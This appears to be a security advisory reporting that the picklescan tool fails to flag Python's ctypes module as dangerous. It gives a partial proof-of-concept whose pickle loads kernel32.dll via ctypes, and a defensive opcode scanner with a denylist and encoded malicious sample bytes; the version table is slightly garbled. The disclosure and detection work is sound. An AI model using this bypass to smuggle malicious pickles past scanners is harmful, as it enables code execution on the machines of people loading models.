Lack of data validation in picklescan
Description
Picklescan does not block ctypes
Summary
Picklescan doesn't flag the ctypes module as dangerous, which is a huge issue. ctypes is basically a foreign function interface library and can be used to:
Load DLLs
Call C functions directly
Manipulate memory through raw pointers
This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue with allowing ctypes is that it can be used down the line to dismantle interpreter-based Python sandboxes, since ctypes allows direct access to raw memory.
This is a more severe loophole than normal gadget chains and bypasses, as raw memory access can be used for a lot of nefarious purposes down the line if left undetected.
PoC
```python
import pickle
import ctypes
import operator

class Kernel32Loader:
    def __reduce__(self):
        # we go direct to the kerneeellllllll
        return (ctypes.WinDLL, ("kernel32.dll",))
...
```
This will create a pickle file which the latest version of picklescan does not detect as malicious. Loading it:
```python
import pickle

print("Loading bypass.pkl...")
pickle.load(open("calc_exploit.pkl", "rb"))
```
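The check the summary says is missing, as an added example (not picklescan's code and not part of the advisory): it walks the pickle opcodes with `pickletools` and flags any import of ctypes without unpickling anything. The denylist, the function names and the sample byte strings are assumptions constructed for illustration.

```python
import pickle
import pickletools

# Assumption: modules this example treats as unsafe. ctypes is the module the
# advisory is about; _ctypes is the C extension behind it.
DENYLIST = {"ctypes", "_ctypes"}
STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}

def pickle_imports(data: bytes):
    """List the (module, name) pairs a pickle would import, without loading it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            # Protocols 0-3: the argument is "module name" as one string.
            module, _, name = arg.partition(" ")
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            # Protocol 4+: module and name are the two strings pushed before it.
            # Simplification: strings fetched from the memo are not resolved.
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
            else:
                found.append(("<unresolved>", "<unresolved>"))
    return found

def flagged(data: bytes):
    """Imports on the denylist, plus any import that could not be resolved."""
    return [(m, n) for m, n in pickle_imports(data)
            if m.split(".")[0] in DENYLIST or m == "<unresolved>"]

# Constructed samples (never unpickled here). Both encode the same reduce call
# as the visible part of the PoC: ctypes.WinDLL("kernel32.dll").
PROTO0_SAMPLE = b"cctypes\nWinDLL\n(Vkernel32.dll\ntR."
PROTO4_SAMPLE = (b"\x80\x04\x8c\x06ctypes\x8c\x06WinDLL\x93"
                 b"\x8c\x0ckernel32.dll\x85R.")
BENIGN_SAMPLE = pickle.dumps({"weights": [1, 2, 3]})

if __name__ == "__main__":
    for label, blob in [("proto0", PROTO0_SAMPLE), ("proto4", PROTO4_SAMPLE),
                        ("benign", BENIGN_SAMPLE)]:
        print(label, flagged(blob) or "clean")
```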
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
pypi | 0.0.33 |